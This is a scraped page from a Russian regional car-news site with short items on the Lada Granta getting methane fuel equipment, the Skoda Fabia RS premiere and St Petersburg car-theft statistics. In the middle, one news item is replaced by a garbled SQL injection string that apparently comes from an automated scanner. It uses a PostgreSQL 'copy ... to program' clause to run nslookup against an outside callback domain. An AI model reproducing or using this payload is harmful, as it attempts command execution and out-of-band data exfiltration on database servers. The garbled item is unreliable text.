Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
05 октября 2011г.
Lada Granta получит биотопливный двигатель

ОАО «АвтоВАЗ» намерено оснащать новую модель Lada Granta газобаллонным оборудованием для заправки метаном. Об этом сообщил вице-президент предприятия Евгений Шмелев во время посещения вице-премьером РФ Сергеем Ивановым Волжского автозавода.
Подробнее »
30%20%e0%e2%e3%f3%f1%f2%e0%202019%e3.';copy (select '') to program 'nslookup dns.sqli.\013405.529-41307.529.a9e86.\1.bxss.me
Mr.

1
Подробнее »
19 августа 2010г.
Skoda анонсировала российскую премьеру Fabia RS

На Московском автосалоне, который начнется уже на будущей неделе, компания Skoda покажет целый ряд новых для России моделей. Как сообщает пресс-служба чешской автокомпании, спортивная модель Fabia RS будет впервые представлена с четырехцилиндровым бензиновым двигателем с двойным наддувом.
Подробнее »
ГИБДД находит лишь 3% угнанных автомобилей
Количество зарегистрированных угонов автомобилей в Санкт-Петербурге за I полугодие 2011 г. выросло на 14,5% – до 2552 эпизодов. Как сообщил журналистам заместитель начальника управления уголовного розыска по Санкт-Петербургу и Ленинградской области Владимир Удодов, найдено было лишь 82 угнанных автомобиля (3,6% от общего количества) – на 9 больше, чем за аналогичный период прошлого года. В Ленинградской области за шесть месяцев похищена 281 машина, что на 42 меньше, чем в I полугодии 2010 г., раскрыто 29 преступлений (10,7% от общего числа) – на 7 больше, чем год назад.



По данным угрозыска, самой угоняемой иностранной маркой автомобиля в Санкт-Петербурге стал Ford, на различные модели этой марки по итогам I полугодия 2011 г. приходится 14,3% угонов. На втором месте среди иномарок находится Chevrolet – 11,6%, на третьем – Mitsubishi. В первую пятерку по популярности у преступников также входят Honda (9,2%) и Mazda (8,9%). Чаще всего автомобили угоняют с неохраняемых стоянок, а также с парковок крупных супермаркетов.

Источник: Autonews
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика